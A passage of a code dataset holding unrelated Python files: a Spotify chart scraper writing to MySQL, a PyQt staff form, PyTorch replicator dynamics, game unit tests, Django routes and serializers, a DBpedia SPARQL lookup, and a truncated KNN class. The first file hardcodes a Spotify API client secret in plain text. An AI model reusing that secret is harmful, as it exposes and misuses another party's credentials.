client_secret='4eed3ec87a9d495abb015fce79cf5314')\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n\n# Today\nimport datetime\ncurrent_date = 
datetime.datetime.today().strftime('%Y-%m-%d')\n\nplaylist_ids = {'United States Viral 50':'37i9dQZEVXbKuaTI1Z1Afx'} #,\n #'United States Top 50':'37i9dQZEVXbLRQDuF5jeBp'}\n\nplaylist_tracks = [current_date]\n\nfor name, id in playlist_ids.items():\n results = sp.user_playlist_tracks(user = 'spotifycharts', playlist_id = id, fields = 'items(track(name, id, artists))')\n \n tracks = []\n track_id = []\n track_name = []\n track_artist = []\n for result in results['items']:\n tracks.append([result['track']['name'], result['track']['id']])\n track_id.append(result['track']['id'])\n track_name.append(result['track']['name'])\n artist_dict = result['track']['artists'][0]\n track_artist.append(artist_dict['name'])\n playlist_tracks.append([name, tracks])\n\nsongs = pd.DataFrame(np.column_stack([track_id, track_name, track_artist]), \n columns=['Id', 'Track_Name', 'Artist'])\n#print(songs)\n\n# First element shows date for 0th element or changes playlist\n# Third element changes song within each playlist\nsong_id = playlist_tracks[1][1][0][1]\nsong_name = playlist_tracks[1][1][0][0]\n\n#print(f'song id: {song_id}')\n#print(f'song name: {song_name}')\nf_id = []\nf_duration_ms = []\nf_key = []\nf_mode = []\nf_Time_Signature = []\nf_acousticness = []\nf_danceablity = []\nf_energy = []\nf_instrumentalness = []\nf_liveness = []\nf_loudness = []\nf_speechiness = []\nf_valence = []\nf_tempo = []\n\nplaylist_audio_features = []\nfor playlist in playlist_tracks[1:]:\n tracks = []\n\n # Create list of ids for each playlist with max of 50 ids\n id = []\n for i in range(0, len(playlist[1])): \n id.append(playlist[1][i][1])\n \n # list of playlist ids\n tracks.append(id)\n audio_feature = sp.audio_features(tracks = tracks[0])\n #print(audio_feature)\n # Add audio feature for song to dictionary\n playlist_audio_features.append(audio_feature)\n print(f'length of audio_feature: {len(audio_feature)}')\n for i in range(0, len(audio_feature)): \n feature_dict = audio_feature[i]\n f_id.append(feature_dict['id'])\n f_duration_ms.append(feature_dict['duration_ms'])\n f_key.append(feature_dict['key'])\n f_mode.append(feature_dict['mode'])\n f_Time_Signature.append(feature_dict['time_signature'])\n f_acousticness.append(feature_dict['acousticness'])\n f_danceablity.append(feature_dict['danceability'])\n f_energy.append(feature_dict['energy'])\n f_instrumentalness.append(feature_dict['instrumentalness'])\n f_liveness.append(feature_dict['liveness'])\n f_loudness.append(feature_dict['loudness'])\n f_speechiness.append(feature_dict['speechiness'])\n f_valence.append(feature_dict['valence'])\n f_tempo.append(feature_dict['tempo']) \n \n\n\n#playlist_audio_features\n#print(playlist_audio_features[0])\nFeatures = (pd.DataFrame(np.column_stack([f_id, f_duration_ms, f_key, f_mode, f_Time_Signature,\n f_acousticness, f_danceablity, f_energy, f_instrumentalness, f_liveness, f_loudness, f_speechiness, f_valence, f_tempo]), \n columns=(['Id','Duration_ms','Key','Mode','Time_Signature','Acousticness','Danceablity','Energy','Instrumentalness','Liveness','Loudness','Speechiness','Valence','tempo'])))\n\n#print(Features)\n\n# # SQFT Dataset\n# # MySQL Connection\n# Define database within MySQL client\nconnection_string = (f\"root:{password}@localhost\")\nengine = create_engine(f\"mysql://{connection_string}\")\nengine.execute(\"DROP DATABASE IF EXISTS music\")\nengine.execute(\"CREATE DATABASE music\")\nengine.execute(\"USE music\")\n\nengine.execute(\"USE music\")\n(songs.to_sql(\n name = 'songs', con = engine, chunksize = 75))\n 
#if_exists = 'replace', chunksize = 75))\nwith engine.connect() as con:\n con.execute('ALTER TABLE `songs` modify Id VARCHAR(22);')\n con.execute('ALTER TABLE `songs` ADD PRIMARY KEY (`Id`);')\n\nengine.execute(\"USE music\")\n(Features.to_sql(\n name = 'Features', con = engine)) #,\n #if_exists = 'replace'))\nwith engine.connect() as con:\n con.execute('ALTER TABLE `Features` modify Id VARCHAR(22);')\n con.execute('ALTER TABLE `Features` ADD PRIMARY KEY (`Id`);')","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"176654749","text":"# -*- coding: utf-8 -*-\n\n\n\nimport sys\nimport qdarkstyle\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass staff_modify_ui(object):\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(728, 649)\n self.mail = QtWidgets.QLabel(Form)\n self.mail.setGeometry(QtCore.QRect(510, 313, 61, 31))\n self.mail.setObjectName(\"mail\")\n self.t_dep = QtWidgets.QTextEdit(Form)\n self.t_dep.setGeometry(QtCore.QRect(590, 193, 107, 31))\n self.t_dep.setObjectName(\"t_dep\")\n\n self.t_tel = QtWidgets.QTextEdit(Form)\n self.t_tel.setGeometry(QtCore.QRect(590, 253, 135,31))\n self.t_tel.setObjectName(\"t_tel\")\n\n self.dep = QtWidgets.QLabel(Form)\n self.dep.setGeometry(QtCore.QRect(510, 193, 51, 31))\n self.dep.setObjectName(\"dep\")\n\n self.t_skills = QtWidgets.QTextEdit(Form)\n self.t_skills.setGeometry(QtCore.QRect(30, 463, 421, 171))\n self.t_skills.setObjectName(\"t_skills\")\n\n self.title = QtWidgets.QLabel(Form)\n self.title.setGeometry(QtCore.QRect(230, 20, 281, 31))\n self.title.setObjectName(\"title\")\n\n self.salary = QtWidgets.QLabel(Form)\n self.salary.setGeometry(QtCore.QRect(270, 313, 51, 31))\n self.salary.setObjectName(\"salary\")\n\n self.t_duty = QtWidgets.QTextEdit(Form)\n self.t_duty.setGeometry(QtCore.QRect(350, 253, 107, 31))\n self.t_duty.setObjectName(\"t_duty\")\n\n self.t_nation = QtWidgets.QTextEdit(Form)\n self.t_nation.setGeometry(QtCore.QRect(350, 133, 107, 31))\n self.t_nation.setObjectName(\"t_nation\")\n\n self.modify = QtWidgets.QPushButton(Form)\n self.modify.setGeometry(QtCore.QRect(540, 583, 171, 41))\n self.modify.setObjectName(\"add\")\n \n \n\n self.bir = QtWidgets.QLabel(Form)\n self.bir.setGeometry(QtCore.QRect(30, 133, 81, 31))\n self.bir.setObjectName(\"bir\")\n\n self.entry = QtWidgets.QLabel(Form)\n self.entry.setGeometry(QtCore.QRect(30, 373, 81, 31))\n self.entry.setObjectName(\"entry\")\n\n self.rank = QtWidgets.QLabel(Form)\n self.rank.setGeometry(QtCore.QRect(30, 313, 51, 31))\n self.rank.setObjectName(\"rank\")\n\n self.t_entry = QtWidgets.QTextEdit(Form)\n self.t_entry.setGeometry(QtCore.QRect(110, 373, 121, 31))\n self.t_entry.setObjectName(\"t_entry\")\n\n self.t_sex = QtWidgets.QTextEdit(Form)\n self.t_sex.setGeometry(QtCore.QRect(590, 73, 107, 31))\n self.t_sex.setObjectName(\"t_sex\")\n\n self.t_bir = QtWidgets.QTextEdit(Form)\n self.t_bir.setGeometry(QtCore.QRect(110, 133, 121, 31))\n self.t_bir.setObjectName(\"t_bir\")\n\n self.skills = QtWidgets.QLabel(Form)\n self.skills.setGeometry(QtCore.QRect(30, 423, 141, 31))\n self.skills.setObjectName(\"skills\")\n\n self.nation = QtWidgets.QLabel(Form)\n self.nation.setGeometry(QtCore.QRect(270, 133, 51, 31))\n self.nation.setObjectName(\"nation\")\n\n self.t_marriage = QtWidgets.QTextEdit(Form)\n self.t_marriage.setGeometry(QtCore.QRect(350, 193, 107, 31))\n 
self.t_marriage.setObjectName(\"t_marriage\")\n\n self.marriage = QtWidgets.QLabel(Form)\n self.marriage.setGeometry(QtCore.QRect(270, 193, 81, 31))\n self.marriage.setObjectName(\"marriage\")\n\n self.depid = QtWidgets.QLabel(Form)\n self.depid.setGeometry(QtCore.QRect(30, 253, 71, 31))\n self.depid.setObjectName(\"depid\")\n\n self.id = QtWidgets.QLabel(Form)\n self.id.setGeometry(QtCore.QRect(30, 73, 71, 31))\n self.id.setObjectName(\"id\")\n\n self.t_name = QtWidgets.QTextEdit(Form)\n self.t_name.setGeometry(QtCore.QRect(350, 73, 107, 31))\n self.t_name.setObjectName(\"t_name\")\n\n self.edu = QtWidgets.QLabel(Form)\n self.edu.setGeometry(QtCore.QRect(30, 193, 61, 31))\n self.edu.setObjectName(\"edu\")\n\n self.t_depid = QtWidgets.QTextEdit(Form)\n self.t_depid.setGeometry(QtCore.QRect(110, 253, 121, 31))\n self.t_depid.setObjectName(\"t_depid\")\n\n self.t_salary = QtWidgets.QTextEdit(Form)\n self.t_salary.setGeometry(QtCore.QRect(350, 313, 107, 31))\n self.t_salary.setObjectName(\"t_salary\")\n\n self.politics = QtWidgets.QLabel(Form)\n self.politics.setGeometry(QtCore.QRect(510, 133, 81, 31))\n self.politics.setObjectName(\"politics\")\n\n self.tel = QtWidgets.QLabel(Form)\n self.tel.setGeometry(QtCore.QRect(510, 253, 61, 31))\n self.tel.setObjectName(\"tel\")\n\n self.name = QtWidgets.QLabel(Form)\n self.name.setGeometry(QtCore.QRect(270, 73, 61, 31))\n self.name.setObjectName(\"name\")\n\n self.duty = QtWidgets.QLabel(Form)\n self.duty.setGeometry(QtCore.QRect(270, 253, 61, 31))\n self.duty.setObjectName(\"duty\")\n\n self.t_id = QtWidgets.QTextEdit(Form)\n self.t_id.setGeometry(QtCore.QRect(110, 73, 121, 31))\n self.t_id.setObjectName(\"t_id\")\n\n self.sex = QtWidgets.QLabel(Form)\n self.sex.setGeometry(QtCore.QRect(510, 73, 51, 31))\n self.sex.setObjectName(\"sex\")\n\n self.t_edu = QtWidgets.QTextEdit(Form)\n self.t_edu.setGeometry(QtCore.QRect(110, 193, 121, 31))\n self.t_edu.setObjectName(\"t_edu\")\n\n self.t_mail = QtWidgets.QTextEdit(Form)\n self.t_mail.setGeometry(QtCore.QRect(590, 313, 135, 31))\n self.t_mail.setObjectName(\"t_mail\")\n\n self.t_politics = QtWidgets.QTextEdit(Form)\n self.t_politics.setGeometry(QtCore.QRect(590, 133, 107, 31))\n self.t_politics.setObjectName(\"t_politics\")\n\n self.t_rank = QtWidgets.QTextEdit(Form)\n self.t_rank.setGeometry(QtCore.QRect(110, 313, 121, 31))\n self.t_rank.setObjectName(\"t_rank\")\n\n self.retranslateUi(Form)\n self.modify.clicked.connect(Form.save_to_database)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"修改员工信息\"))\n self.mail.setText(_translate(\"Form\", \"邮箱\"))\n self.dep.setText(_translate(\"Form\", \"部门\"))\n self.title.setText(_translate(\"Form\", \"
修改员工信息
\"))\n self.salary.setText(_translate(\"Form\", \"工资\"))\n self.modify.setText(_translate(\"Form\", \"保存修改\"))\n self.bir.setText(_translate(\"Form\", \"出生日期\"))\n self.entry.setText(_translate(\"Form\", \"入职日期\"))\n self.rank.setText(_translate(\"Form\", \"级别\"))\n self.skills.setText(_translate(\"Form\", \"工作经验及技能\"))\n self.nation.setText(_translate(\"Form\", \"民族\"))\n self.marriage.setText(_translate(\"Form\", \"婚姻状况\"))\n self.depid.setText(_translate(\"Form\", \"部门ID\"))\n self.id.setText(_translate(\"Form\", \"员工Id\"))\n self.edu.setText(_translate(\"Form\", \"学历\"))\n self.politics.setText(_translate(\"Form\", \"政治面貌\"))\n self.tel.setText(_translate(\"Form\", \"手机\"))\n self.name.setText(_translate(\"Form\", \"姓名\"))\n self.duty.setText(_translate(\"Form\", \"职务\"))\n self.sex.setText(_translate(\"Form\", \"性别\"))\n\n\n\nif __name__ == \"__main__\":\n \n app = QtWidgets.QApplication(sys.argv)\n app.setWindowIcon(QIcon(\"./source/staff.png\"))\n app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n Form = QtWidgets.QWidget()\n ui = staff_modify_ui()\n ui.setupUi(Form)\n Form.show()\n sys.exit(app.exec_())\n","sub_path":"source/staff_modify_ui.py","file_name":"staff_modify_ui.py","file_ext":"py","file_size_in_byte":7671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"579087345","text":"\nimport torch\nimport warnings\n\n# import logging\n# logger = logging.getLogger('logger')\n# logger.warning('prova')\n\n__all__ = ['dynamics']\n\n\ndef dynamics(W, X, tol=1e-6, max_iter=5, mode='replicator', **kwargs):\n \"\"\"\n Selector for dynamics\n Input:\n W: the pairwise nxn similarity matrix (with zero diagonal)\n X: an (n,m)-array whose rows reside in the n-dimensional simplex. If\n an (n,)-array is provided, it must reside in the n-dimensional simplex\n tol: error tolerance\n max_iter: maximum number of iterations\n mode: 'replicator' to run classical replicator dynamics,\n 'exponential' to run exponential replicator dynamics.\n 'inf_imm' to run infection-immunization dynamics (not implemented).\n \"\"\"\n\n if mode == 'replicator':\n X = _replicator(W, X, tol, max_iter)\n elif mode == 'exponential':\n X = _exponential(W, X, tol, max_iter, kwargs.get('k', 1.))\n elif mode == 'inf_imm':\n if X.dim == 2:\n raise ValueError('Currently, only one-dimensional vectors are '\n 'accepted with \\'inf_imm\\' mode')\n X = _inf_imm(W, X, tol, max_iter)\n else:\n raise ValueError('mode \\'' + mode + '\\' is not defined.')\n\n return X\n\n\ndef _replicator(W, X, tol, max_iter):\n \"\"\"\n Replicator Dynamics\n Output:\n X: the population(s) at convergence\n i: the number of iterations needed to converge\n prec: the precision reached by the dynamical system\n \"\"\"\n\n i = 0\n while i < max_iter:\n X = X * torch.matmul(W, X)\n # z = X.register_hook(lambda g: print(g))\n # print(z)\n X /= X.sum(dim=X.dim() - 1).unsqueeze(X.dim() - 1)+1e-12 # dirty fix for division of zero error creating Nan\n # z = X.register_hook(lambda g: print(g))\n # print(z)\n\n i += 1\n\n return X\n\n\ndef _exponential(W, X, tol, max_iter, k):\n \"\"\"\n Exponential Replicator Dynamics\n Input:\n k: the \"acceleration\" parameter of the dynamical system\n Output:\n x: the population(s) at convergence\n iter: the number of iterations needed to converge\n prec: the precision reached by the dynamical system\n \"\"\"\n\n err = 2. 
* tol\n i = 0\n while err > tol and i < max_iter:\n X_old = X\n X = X * torch.exp(k * (torch.matmul(W, X) - 1.)) # softmax trick\n X /= X.sum(dim=X.dim() - 1).unsqueeze(X.dim() - 1)\n\n err = torch.norm(X - X_old)\n i += 1\n\n if i == max_iter:\n warnings.warn(\"Maximum number of iterations reached.\")\n\n return X\n\n\ndef _inf_imm(W, X, tol, max_iter):\n \"\"\"\n Infection Immunization Dynamics\n Output:\n x: the population(s) at convergence\n iter: the number of iterations needed to converge\n prec: the precision reached by the dynamical system\n \"\"\"\n dtype = X.dtype # casting dtype for ByteTensors\n\n WX = torch.matmul(W, X)\n XWX = torch.matmul(WX, X)\n r = WX - XWX\n\n # TODO: check Nash error\n err = (torch.max(X, r) ** 2.).sum()\n i = 0\n\n while err > tol and i < max_iter:\n max_, imax = torch.max(r, dim=0)\n min_, imin = torch.min(r * (X > 0.).to(dtype), dim=0) # TODO: check\n infective = imax if max_ > -min_ else imin\n den = W[infective, infective] - WX[infective] - r[infective]\n\n do_remove = False\n if r[infective] >= 0.:\n mu = 1.\n if den < 0:\n opt_delta = -r[infective] / den\n if opt_delta < mu:\n mu = opt_delta\n # if mu < 0.: mu = 0.\n else:\n do_remove = True\n mu = X[infective] / (X[infective] - 1.)\n if den < 0.:\n opt_delta = -r[infective] / den\n if opt_delta >= mu:\n mu = opt_delta\n do_remove = False\n\n n = X.shape[0]\n X = mu * ((torch.arange(n, device=X.device) == infective).to(\n dtype) - X) + X\n\n if do_remove:\n X[infective] = 0.\n\n WX = mu * (W[infective, :] - WX) + WX\n\n XWX = torch.matmul(X, WX)\n r = WX - XWX\n\n err = (torch.max(X, r) ** 2.).sum()\n i += 1\n\n if i == max_iter:\n warnings.warn(\"Maximum number of iterations reached.\")\n\n return X","sub_path":"dynamics.py","file_name":"dynamics.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"387846136","text":"import unittest\nimport time\n\nfrom sqlalchemy import exists\nfrom sqlalchemy_utils.functions import drop_database\n\nfrom src.database import init_db, engine, session\nfrom src.models import Game, Player\n\nfrom src.tests.question_tests import add_questions, questions\nfrom src.tests.player_test import players, add_players\n\n\ndef add_players_to_game(game):\n for p in players:\n game.players.append(p)\n session.commit()\n\n\nclass TestGame(unittest.TestCase):\n def setUp(self):\n init_db()\n self.create_game()\n\n def tearDown(self):\n drop_database(engine.url)\n session.commit()\n\n def create_game(self):\n self.game_name = \"Skindustries 16 mei 2016\"\n\n self.g = Game(self.game_name)\n self.g.save()\n\n def test_create_game(self):\n \"\"\"\n Test if a game can be created using a name\n \"\"\"\n game_name = \"Skindustries 9 mei 2016\"\n g = Game(game_name)\n save = g.save()\n\n assert session.query(exists().where(\n Game.name == game_name)).scalar() == True\n assert save is True\n\n def test_duplicate_game_name(self):\n \"\"\"\n Assert if a duplicate game name is caught and returns False\n \"\"\"\n game_name = \"Skindustries 16 mei 2016\"\n g = Game(game_name)\n save = g.save()\n assert save is False\n\n def test_get_random_question(self):\n add_questions()\n question_ids = []\n for i in range(len(questions)):\n question = self.g.get_random_question()\n assert question.question_id not in question_ids\n question_ids.append(question.question_id)\n\n def test_add_player(self):\n player_name = \"Neal\"\n player = Player(player_name)\n self.g.add_player(player)\n\n query = 
session.query(Game)\n g = query.filter(Game.game_id == self.g.game_id).first()\n\n assert g.players[0].name == player_name\n\n def test_add_multiple_players(self):\n player_1_name = \"Neal\"\n player_2_name = \"Kittie\"\n player_3_name = \"Desmond\"\n\n player_1 = Player(player_1_name)\n player_2 = Player(player_2_name)\n player_3 = Player(player_3_name)\n\n self.g.add_player(player_1)\n self.g.add_player(player_2)\n self.g.add_player(player_3)\n\n query = session.query(Game)\n g = query.filter(Game.game_id == self.g.game_id).first()\n\n assert len(g.players) > 1\n\n def test_reset_questions(self):\n add_questions()\n for i in range(len(questions)):\n self.g.get_random_question()\n\n assert len(self.g.questions) > 0\n\n self.g.reset_questions()\n assert len(self.g.questions) == 0\n\n def test_next_round(self):\n assert self.g.round == 1\n self.g.next_round()\n assert self.g.round == 2\n\n def test_start_player(self):\n add_players_to_game(self.g)\n\n for i in range(10):\n time.sleep(3)\n p = self.g.select_start_player()\n print(p)\n\n def test_increase_score(self):\n for i in range(20):\n self.g.increase_score()\n print(self.g.current_score)\n print(self.g.total_score)\n","sub_path":"kivy_version/src/tests/game_tests.py","file_name":"game_tests.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576733523","text":"#3052번_나머지\n\nn_list = [int(input()) for i in range(0,10)]\nck_list = []\n\nfor i in n_list:\n ck_list.append(i%42)\n\nmy_set = set(ck_list)\nnew_list = list(my_set)\nprint(len(new_list))\n","sub_path":"05_일차원배열/[04]3052번_나머지.py","file_name":"[04]3052번_나머지.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88297833","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls.defaults import *\nfrom ragendja.urlsauto import urlpatterns\nfrom ragendja.auth.urls import urlpatterns as auth_patterns\nfrom myapp.forms import UserRegistrationForm\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nhandler500 = 'ragendja.views.server_error'\n\nurlpatterns = auth_patterns + patterns('',\n ('^admin/(.*)', admin.site.root),\n (r'^$', 'django.views.generic.simple.direct_to_template',\n {'template': 'main.html'}),\n # Override the default registration form\n url(r'^account/register/$', 'registration.views.register',\n kwargs={'form_class': UserRegistrationForm},\n name='registration_register'),\n url(r'^_ah/queue/deferred', 'myapp.views.ah_queue_deferred', name='ah_queue_deferred'),\n url(r'^_ah/warmup', 'myapp.views.ah_warmup', name='ah_warmup'),\n url(r'^_ah/start', 'myapp.views.ah_start', name='ah_start'),\n url(r'^_ah/stop', 'myapp.views.ah_stop', name='ah_stop'),\n) + urlpatterns\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195534837","text":"# coding: utf-8\n\ndesc={\"ref\": {\"H2\": \"https://www.britannica.com/science/hydrogen\"},\n \"brief\": \"Hydrogen molecule.\",\n \"usage\": \"No options available.\"\n }\n\nimport numpy as np\n\nsites = np.array([[0,0,-0.037],\n [0,0,+0.037]]) # nm, HH\n\nlabels = [\"H\",\"H\"]\nname = \"H2\"\n","sub_path":"genice/molecules/H2.py","file_name":"H2.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"451808650","text":"# --- imports ---\nfrom pprint import pprint\nimport re\nfrom SPARQLWrapper import SPARQLWrapper, JSON\nsparql = SPARQLWrapper(\"http://dbpedia.org/sparql\")\nsparql.setTimeout(100)\nsparql.query()\nsparql.addDefaultGraph(\"http://dbpedia.org\")\n\n# --- constants ---\nVERBOSE=False\n\n# ontology\nSPARQ_AUTHOR_NAME = \"\"\"\n PREFIX rdf: \n PREFIX dbp: \n SELECT ?person\n WHERE {{\n ?person a dbp:Person .\n ?person foaf:name ?name\n FILTER ((LANG(?name)=\"en\" or LANG(?name)=\"fr\") and CONTAINS(?name, \"{}\")).\n }}\n LIMIT 10\n\"\"\"\nSPARQ_MOVEMENTS = \"\"\"\n PREFIX rdf: \n PREFIX dbp: \n PREFIX dct: \n SELECT ?genre ?genre_name\n WHERE {{\n <{}> dbp:genre ?genre .\n ?genre dct:subject dbc:Literary_movements .\n ?genre rdfs:label ?genre_name .\n FILTER (LANG(?genre_name)=\"fr\")\n }}\n LIMIT 10\n\"\"\"\nSPARQ_MOVEMENTS = \"\"\"\n PREFIX rdf: \n PREFIX dbp: \n PREFIX dct: \n SELECT ?genre ?genre_name\n WHERE {{\n <{}> ?genre .\n ?genre rdfs:label ?genre_name .\n FILTER (LANG(?genre_name)=\"fr\")\n }}\n LIMIT 10\n\"\"\"\n\n# --- code ---\ndef get_uri_from_name(author_name, verbose=VERBOSE):\n query = SPARQ_AUTHOR_NAME.format(author_name)\n sparql.setQuery(query)\n sparql.setReturnFormat(JSON)\n if verbose: print(\"Query:\\n{}\".format(query))\n \n results = sparql.query().convert()\n \n if len(results['results']['bindings']) > 0: # if the querry did yield results, return the first one\n author_uri = results['results']['bindings'][0]['person']['value']\n if verbose: print(\"\\nResult: '{}'\".format(author_uri))\n \n else: # if the querry didn't yield any result, return None\n author_uri = None\n if verbose: print(\"\\nNo result\")\n \n return author_uri\n\ndef get_author_uri(author_name, verbose=VERBOSE):\n if verbose: print(\"Raw name: {}\".format(author_name))\n \n # three kind of names (in each case, can be followed by years):\n # - family name, initials (given name)\n # - family name, given name\n # - full name\n re_family_given_parenthesis_date = r'([^,]+), (?:(.+) )?\\(([^,]+)\\)(, ?[-\\d\\?]+)?'\n re_family_given_date = r'([^,]+), (?:([^,]+))(, ?[-\\d\\?]+)?'\n re_date = r'(, ?[-\\d\\?]+)?'\n \n author_uri = None\n \n # try to match \"family name, initials (given name)\"\n match = re.match(re_family_given_parenthesis_date, author_name)\n if match:\n family_name, initials, given_name = match.group(1, 2, 3)\n if verbose: print(\"Given name: {}\\n\"\n \"Initials: {}\\n\"\n \"Family name: {}\".format(given_name, initials, family_name))\n \n # query with given and family names, and with initials and family name if it fails\n author_uri = (get_uri_from_name(given_name + ' ' + family_name, verbose=verbose) or\n get_uri_from_name(initials + ' ' + family_name, verbose=verbose))\n \n # try to match \"family name, given name\"\n match = re.match(re_family_given_date, author_name)\n if match and not author_uri:\n family_name, given_name = match.group(1, 2)\n if verbose: print(\"Given name: {}\\n\"\n \"Family name: {}\".format(given_name, family_name))\n \n # query with given and family names\n author_uri = get_uri_from_name(given_name + ' ' + family_name, verbose=verbose)\n \n # if nothing else yielded result, we just remove the years at the end of the name\n if not author_uri:\n name = re.sub(re_date, '', author_name)\n if verbose: print(\"Full name: {}\".format(name))\n \n # query with full name\n author_uri = get_uri_from_name(name, verbose=verbose)\n \n return author_uri\n\ndef get_movements(author_uri, verbose=VERBOSE):\n query = 
SPARQ_MOVEMENTS.format(author_uri)\n sparql.setQuery(query)\n sparql.setReturnFormat(JSON)\n #if verbose: print(\"Query:\\n{}\".format(query))\n \n results = sparql.query().convert()\n \n # create a dictionary of languages and the corresponding abstract\n movements = dict()\n for result in results['results']['bindings']:\n movements[result['genre']['value']] = result['genre_name']['value']\n \n if verbose: print(\"Movements\"); pprint(movements)\n \n return movements\n\ndef get_movements_from_name(author_name, verbose=VERBOSE):\n author_uri = get_author_uri(author, verbose=verbose)\n \n if author_uri:\n if verbose: print(author, \"found:\", author_uri)\n\n movements = get_movements(author_uri, verbose=verbose)\n \n return author_uri, movements\n \n else:\n if verbose: print(f\"'{author}' not found among the authors\")\n return None, None\n\n# --- main ---\nif __name__ == \"__main__\":\n test = {\n 'Aaron, S. F. (Samuel Francis), 1862-': {\n \"Radio Boys Cronies\\rOr, Bill Brown's Radio\": '/ebooks/11861',\n 'Radio Boys Loyalty; Or, Bill Brown Listens In': '/ebooks/25753'},\n 'Abbott, Charles C. (Charles Conrad), 1843-1919': {'Outings at Odd Times': '/ebooks/48916',\n 'Travels in a Tree-top': '/ebooks/55805'},\n 'Abbott, Edwin Abbott, 1838-1926': {'Flatland: A Romance of Many Dimensions': '/ebooks/45506',\n 'Flatland: A Romance of Many Dimensions (Illustrated)': '/ebooks/201',\n 'How to Write Clearly: Rules and Exercises on English Composition': '/ebooks/22600',\n 'Onesimus: Memoirs of a Disciple of St. Paul': '/ebooks/54223',\n 'Philochristus: Memoirs of a Disciple of the Lord': '/ebooks/48843',\n 'Silanus the Christian': '/ebooks/56843'},\n 'Abbott, Eleanor Hallowell, 1872-1958': {'Fairy Prince and Other Stories': '/ebooks/26399',\n 'The Indiscreet Letter': '/ebooks/15728',\n 'Little Eve Edgarton': '/ebooks/15660',\n 'Molly Make-Believe': '/ebooks/18665',\n 'Old-Dad': '/ebooks/48990',\n 'Peace on Earth, Good-will to Dogs': '/ebooks/20213',\n 'Rainy Week': '/ebooks/43025',\n \"The Sick-a-Bed LadyAnd Also Hickory Dock, The Very Tired Girl, The Happy-Day, Something That Happened in October, The Amateur Lover, Heart of The City, The Pink Sash, Woman's Only Business\": '/ebooks/34829',\n 'The Stingy Receiver': '/ebooks/49330',\n 'The White Linen Nurse': '/ebooks/14506'},\n 'Guy de Maupassant':{}}\n\n for author in test.keys():\n print(get_movements_from_name(author))","sub_path":"experiments/author_movement.py","file_name":"author_movement.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"615098094","text":"from rest_framework import serializers\nfrom . 
models import Pizza,Topping,Size,Type\n\nclass ToppingSerializer(serializers.ModelSerializer):\n class Meta:\n model=Topping \n fields=('name',)\n\nclass SizeSerializer(serializers.ModelSerializer):\n class Meta:\n model=Size \n fields=('val',)\n\nclass TypeSerializer(serializers.ModelSerializer):\n class Meta:\n model=Type \n fields=('name',)\n\nclass PizzaSerializer(serializers.ModelSerializer):\n toppings=ToppingSerializer(many=True)\n sizes=SizeSerializer(many=True)\n types=TypeSerializer(many=True)\n class Meta:\n model=Pizza\n fields=('id','name','toppings','sizes','types')\n def create(self, validated_data):\n temp_topping = validated_data.pop('toppings')\n temp_size = validated_data.pop('sizes')\n temp_types = validated_data.pop('types')\n # drop duplicates while preserving order\n topping = [i for n, i in enumerate(temp_topping) if i not in temp_topping[:n]]\n size = [i for n, i in enumerate(temp_size) if i not in temp_size[:n]]\n types = [i for n, i in enumerate(temp_types) if i not in temp_types[:n]]\n piza = Pizza.objects.create(**validated_data)\n # get_or_create replaces the bare try/except lookups and avoids duplicate rows\n for i in topping:\n obj, _ = Topping.objects.get_or_create(**dict(i))\n piza.toppings.add(obj)\n for i in size:\n obj, _ = Size.objects.get_or_create(**dict(i))\n piza.sizes.add(obj)\n for i in types:\n obj, _ = Type.objects.get_or_create(**dict(i))\n piza.types.add(obj)\n return piza\n def update(self, instance, validated_data):\n if(validated_data['name']!=''):\n instance.name=validated_data['name']\n if(validated_data['toppings']!=[]):\n for i in validated_data['toppings']:\n # adding an already-linked object to a M2M field is a no-op\n obj, _ = Topping.objects.get_or_create(name=i['name'])\n instance.toppings.add(obj)\n if(validated_data['sizes']!=[]):\n for i in validated_data['sizes']:\n obj, _ = Size.objects.get_or_create(val=i['val'])\n instance.sizes.add(obj)\n if(validated_data['types']!=[]):\n val=dict(validated_data.get('types')[0])\n # a pizza keeps a single type: drop the old one before adding the new\n if(len(instance.types.all())!=0):\n instance.types.all()[0].delete()\n if(val['name'] in ('Square', 'Regular')):\n obj, _ = Type.objects.get_or_create(name=val['name'])\n instance.types.add(obj)\n instance.save()\n return instance","sub_path":"Django/Pizza/Pizproj/pizzaapp/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"509357628","text":"#!/usr/bin/env python3\nfrom scipy.spatial import distance\n\ndef euc(a,b):\n\treturn distance.euclidean(a,b)\n\nclass ScrappyKNN():\n\tdef fit(self, X_train, y_train):\n\t\tself.X_train = X_train\n\t\tself.y_train = y_train\n\tdef predict(self, X_test):\n\t\tpredictions = []\n\t\tfor row in X_test:\n\t\t\tlabel = self.closest(row)\n\t\t\tpredictions.append(label)\n\t\treturn predictions\n\tdef closest(self, row):\n\t\tbest = euc(row, self.X_train[0])\n\t\tbest_index = 0\n\t\tfor i in 